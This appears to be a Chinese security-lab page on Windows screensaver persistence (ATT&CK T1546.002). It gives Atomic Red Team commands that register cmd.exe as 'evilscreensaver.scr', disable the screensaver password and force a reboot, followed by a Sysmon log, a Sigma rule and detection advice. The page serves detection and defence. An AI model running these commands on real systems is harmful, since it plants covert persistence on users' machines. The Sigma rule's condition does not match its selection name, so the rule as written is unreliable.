跳转至

T1546-002-win-事件触发执行-屏幕保护程序

来自ATT&CK描述

攻击者可以通过执行由用户不活动引发的恶意内容来建立持久性。屏幕保护程序是在用户不活动的可配置时间后执行的程序,由扩展名为.scr的便携式可执行文件(PE)组成。Windows屏幕保护程序scrnsave.scr位于C:\Windows\System32\,在64位Windows系统上位于C:\Windows\sysWOW64\,与基本Windows安装中的屏幕保护程序一起。

以下屏幕保护程序设置存储在注册表 ( HKCU\Control Panel\Desktop\) 中,可以通过操作来实现持久性: - SCRNSAVE.exe -设置为恶意PE路径 - ScreenSaveActive -设置为“1”以启用屏幕保护程序 - ScreenSaverIsSecure -设置为“0”不需要密码解锁 - ScreenSaveTimeout -在执行屏幕保护程序之前设置用户不活动超时

攻击者可以使用屏幕保护程序设置来保持持久性,方法是将屏幕保护程序设置为在用户不活动的特定时间范围内运行恶意软件。

测试案例

测试1 Set Arbitrary Binary as Screensaver

该测试将一个二进制文件复制到Windows System32文件夹中,并将其设置为屏幕保护程序,因此它执行后会建立持久性。需要重新启动和登录。

测试命令,用命令提示符运行,需要admin/root权限: 

copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
shutdown /r /t 0

input_binary:C:\Windows\System32\cmd.exe

检测日志

Windows Sysmon日志

测试复现

测试1 Set Arbitrary Binary as Screensaver

copy C:\Windows\System32\cmd.exe "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
shutdown /r /t 0

测试留痕

测试1 Set Arbitrary Binary as Screensaver

Process Create:

RuleName: technique_id=T1112,technique_name=Modify Registry

UtcTime: 2022-01-11 13:14:16.334

ProcessGuid: {78c84c47-82a8-61dd-5928-000000000800}

ProcessId: 5496

Image: C:\Windows\System32\reg.exe

FileVersion: 10.0.17763.1 (WinBuild.160101.0800)

Description: Registry Console Tool

Product: Microsoft® Operating System

Company: Microsoft Corporation

OriginalFileName: reg.exe

CommandLine: reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\Windows\System32\evilscreensaver.scr" /f

CurrentDirectory: C:\Users\Administrator.ZHULI\

User: ZHULI\Administrator

LogonGuid: {78c84c47-f665-61db-95da-440100000000}

LogonId: 0x144DA95

TerminalSessionId: 3

IntegrityLevel: High

Hashes: SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC

ParentProcessGuid: {78c84c47-7dc0-61dd-a227-000000000800}

ParentProcessId: 5028

ParentImage: C:\Windows\System32\cmd.exe

ParentCommandLine: "C:\Windows\system32\cmd.exe" 

ParentUser: ZHULI\Administrator

检测规则/思路

Sigma规则

title: 更改屏幕保护程序实现持久化
status: experimental
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/910a2a764a66b0905065d8bdedb04b37049a85db/atomics/T1546.002/T1546.007.md
date: 2022-01-11
tags:
    - attack.t1546-002
author: 12306Br0
logsource:
    product: windows
    service: sysmon
detection:
    selection_registry:
        EventID: 1 #进程创建
        CommandLine:'HKEY_CURRENT_USER\Control Panel\Desktop'
    condition: selection
level: medium

或许,通过Windows安全日志对注册表修改行为进行检测,效果会更好!

建议

监控.scr文件的进程执行和命令行参数。监控注册表中可能与典型用户行为不相关的屏幕保护程序配置更改。

Sysinternals Autoruns等工具可用于检测注册表中屏幕保护程序二进制路径的更改。可疑路径和PE文件可能表明网络中的合法屏幕保护程序存在异常值,应进行调查。

参考推荐

MITRE-ATT&CK-T1546-002

https://attack.mitre.org/techniques/T1546/002

Atomic-red-team-T1546-002

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md